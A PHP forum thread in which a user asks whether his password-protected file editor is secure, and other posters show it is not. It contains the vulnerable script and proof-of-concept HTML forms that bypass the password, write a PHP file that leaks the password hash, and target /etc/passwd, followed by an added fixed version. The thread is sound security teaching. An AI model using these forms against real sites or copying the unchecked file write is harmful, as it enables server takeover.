Is this secure? (PHP and filesystem)

Is this secure? (PHP and filesystem)

Post by earlz »

I have made a cool little script to allow me to edit files quick and easily, just enter my password and go..(plus I can have one part automatically add timestamps in the text for me!)
so now..is this secure?
this is the code:

Code:

<?php
/**Made by Jordan Earls...
it depends on you to send a valid filename in 'file' and for you to put a style
this can be 'blog' for blogging like updating, or anything else for standard editing
also the plain text user password is sent in 'pass' and umm..that's it..NOTE no 'edit' value should
be sent from the calling script, it should only be used internally with this file!(everything should be in POST

**/
  $password="<CENSORED>"; //the MD5 hashed password

if($_POST['edit']=="edit"){ //if we need to edit the file
	file_put_contents($_POST['file'],stripslashes(html_entity_decode($_POST['new_text'],ENT_NOQUOTES))); //dunno why we stripslashes twice, but it works..
	echo "File updated!"; //stay calm! lol
}
if($_POST['edit']=="blog"){ //If using blog like editing
$retr=chr(13).chr(10); //just a convenient way to say "\r\n" (CR LF)
$past_content=file_get_contents($_POST['file']); //store the current contents..
$fhandle=fopen($_POST['file'],"w+b");
fwrite($fhandle,":.:".'<font size=5><u>'.stripslashes($_POST['name']).'</u></font>'.":.:".$retr); //write the first line which has the submission name
fwrite($fhandle,stripslashes($_POST['text'])); //write the actual text after it
fwrite($fhandle,$retr.'<font size=1>'.'['.date("r").']'.'</font>'.$retr.$retr.'<hr>'.$retr); //now write a small timestamp
fwrite($fhandle,$past_content); //write it back
fclose($fhandle);
echo "Blog File Updated!";
}

?>

<html>
<head>
<title>Edit Pages</title>
</head>
<body>
<?php
if(md5($_POST['pass'])==$password){
?>
<form name="input" action="" method="POST">
<?php
 if($_POST['style']!="blog"){
?>
<textarea rows=40 cols=80 name="new_text"><?php echo stripslashes(htmlentities(file_get_contents($_POST['file']),ENT_NOQUOTES)); ?></textarea>
<input type="hidden" name="file" value="<?echo $_POST['file'];?>"><br>
<input type="hidden" name="edit" value="edit"><br>
<input type="hidden" name="style" value="<?echo $_POST['style'];?>">
<input type="hidden" name="pass" value="<?echo $_POST['pass'];?>">
<input type="submit" name="submitbut" value="Edit File">
<?php
 }else{ //if using blog way
?>
Name of submission: <input type="text" name="name"><br><br>
<textarea rows=20 cols=40 name="text"></textarea><br><br>
<input type="hidden" name="file" value="<?echo $_POST['file'];?>">
<input type="hidden" name="edit" value="blog">
<input type="hidden" name="style" value="<?echo $_POST['style'];?>">
<input type="hidden" name="pass" value="<?echo $_POST['pass'];?>">
<input type="submit" name="submitbut" value="Edit">
<?}?>
</form>


<?php
 }else{ //the password didn't match!
?>
You are not allowed to access this page, the password was incorrect...(don't try anything stupid you hackers)

<?}?>
</body>
</html>
and it is simply called from my pages like this:

Code:

<form name="edit" action="update.php" method="POST">
<input type="password" name="pass"><br>
<input type="hidden" name="file" value="<?echo $content_filename?>">
<input type="hidden" name="style" value="<?echo $edit_style?>">
<input type="submit" value="Edit This Page"><br>

</form>
and those variables echo'd there are set depending on which page I am..

so is all of this stuff secure? like, unless someone decides to just attack with random passwords, it's pretty much hack-proof?
I really don't care that my password is sent unencrypted btw..I use a different password for it anyway..
Post by dave »

Well, for starters that is completely insecure. At minimum put a password check around the code that actually does the work.

Here is a little test for you. Just copy and paste it to an html file.

Code:

<html>
<head>
</head>
<body>

<form name="edit" action="http://jouleos.galekus.com/update.php" method="POST">
Name of submission: <input type="text" name="name"><br><br> 
<textarea rows=20 cols=40 name="text"></textarea><br><br> 
<input type="hidden" name="file" value="blog.txt"> 
<input type="hidden" name="edit" value="blog"> 
<input type="hidden" name="style" value="blog"> 
<input type="hidden" name="pass" value="doesntmatter"> 
<input type="submit" name="submitbut" value="Edit">
</form> 

</body>
</html>
Dave
Last edited by dave on Mon Jun 04, 2007 11:15 pm, edited 1 time in total.
Post by Zacariaz »

in my opinion there is nothing you can do in the code itself to make it completely secure.
Post by dave »

ya but you could at least make it so you actually need the password.
Re: Is this secure? (PHP and filesystem)

Post by B.E »

First find out what's going to happen when this is submitted

Code:

<html>
<body>
<form name="input" action="http://<site to which your script is on>/update.php" method="POST">
<textarea rows=40 cols=80 name="new_text"></textarea> 
<input type="hidden" name="file" value="temp.php"><br> 
<input type="hidden" name="edit" value="edit"><br> 
<input type="submit" name="submitbut" value="Edit File"> 
</form>
and enter the following into the textfield.

Code:

<?
   include "update.php";
   echo $password;
?>
then went to http://<your site>/temp.php, cracked the resulting md5 code (which would be your password), then used the following form with that password.

Code:

<form name="edit" action="update.php" method="POST">
<input type="password" name="pass"><br>
<input type="hidden" name="file" value="/etc/passwd"> <!-- you could use C:\\windows\system32\sam -->
<input type="hidden" name="style" value="">
<input type="submit" value="Edit This Page"><br>

</form> 
Microsoft: "let everyone run after us. We'll just INNOV~1"
Post by earlz »

ok..thanks for hacking it everyone!

Best get hacked and a small message be displayed, than later on some hacker deletes all my content (which I don't back up very often)


but yea..I've removed the script from my actual site now..
I'm going to
1. disable off-site access
2. check the password at the beginning, not at the display so that it checks the password when it saves


one question..
how did you do that include 'update.php' I thought you had to be on the site to do that!
Post by dave »

Well, since a form specifies which file to write to on the server and you used "w+b" in your call to fopen, a nonexistent file will be created in your webserver's directory. Meaning if that php code is specified to write to a new php file, your script will create the file and dump the code into the file. Then the url to that file can be specified, causing the code to execute on the server.
Post by B.E »

hckr83 wrote:how did you do that include 'update.php' I thought you had to be on the site to do that!
I used a security hole with the following lines

Code:

if($_POST['edit']=="edit"){ //if we need to edit the file
   file_put_contents($_POST['file'],stripslashes(html_entity_decode($_POST['new_text'],ENT_NOQUOTES))); //dunno why we stripslashes twice, but it works..
   echo "File updated!"; //stay calm! lol
} 
because you don't check what $_POST['file'] is. I was able to specify a file name myself (which was temp.php). As it was a .php, your server interpreted it as an executable script. I simply provided the contents of a php script, in which I included your update.php (which contained the $password variable).
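One way to apply the two fixes the thread converges on (dave's "check the password around the code that does the work" and B.E.'s "you don't check what $_POST['file'] is"), written here as an added example and not earlz's script; `EDIT_DIR`, the `ALLOWED` list and the password-hash value are assumed placeholders, and the original `stripslashes()` calls are dropped because they only undid magic_quotes.

```php
<?php
// Added example, not the original update.php: the same editor with the two fixes the
// thread asks for. EDIT_DIR, the ALLOWED list and the hash value are assumed placeholders.
declare(strict_types=1);
const EDIT_DIR = __DIR__ . '/pages';        // only files under this directory are editable
const ALLOWED  = ['blog.txt', 'about.txt']; // assumed whitelist of editable file names
// Generate once with password_hash('your password', PASSWORD_DEFAULT) and paste here
const PASSWORD_HASH = '<PASSWORD_HASH_PLACEHOLDER>';

// Map the submitted 'file' value to an approved path, or null if it is not approved.
function resolveEditableFile(string $name): ?string {
    // basename() drops any directory part, so "../x" or "/etc/passwd" becomes a bare name
    $base = basename($name);
    if (!in_array($base, ALLOWED, true)) {
        return null;
    }
    // realpath() fails for missing files and resolves symlinks; the result must still
    // sit under EDIT_DIR so that a symlinked entry cannot point outside the directory
    $path = realpath(EDIT_DIR . '/' . $base);
    if ($path === false || strpos($path, realpath(EDIT_DIR) . '/') !== 0) {
        return null;
    }
    return $path;
}

// 1. Authenticate before any branch that writes. password_verify() is constant-time
//    and replaces the md5($_POST['pass']) == $password check that only guarded the form.
if (!password_verify($_POST['pass'] ?? '', PASSWORD_HASH)) {
    http_response_code(403);
    exit('Password incorrect.');
}
// 2. Refuse any target that is not one of the approved files (closes the temp.php write).
$file = resolveEditableFile($_POST['file'] ?? '');
if ($file === null) {
    http_response_code(400);
    exit('That file cannot be edited.');
}
// 3. Only now perform the edit, on the validated path.
$mode = $_POST['edit'] ?? '';
if ($mode === 'edit') {
    file_put_contents($file, $_POST['new_text'] ?? '', LOCK_EX);
    echo 'File updated!';
} elseif ($mode === 'blog') {
    // same layout as the original blog entry: title line, text, timestamp, rule
    $entry = ':.:' . htmlspecialchars($_POST['name'] ?? '') . ":.:\r\n"
           . ($_POST['text'] ?? '') . "\r\n[" . date('r') . "]\r\n\r\n<hr>\r\n";
    file_put_contents($file, $entry . file_get_contents($file), LOCK_EX); // prepend, as before
    echo 'Blog file updated!';
}
```

The whitelist plus `realpath()` check means a request for `temp.php`, `/etc/passwd` or `../update.php` is rejected before any filesystem call, and the password check now runs on the write request itself rather than only on the form that displays the editor.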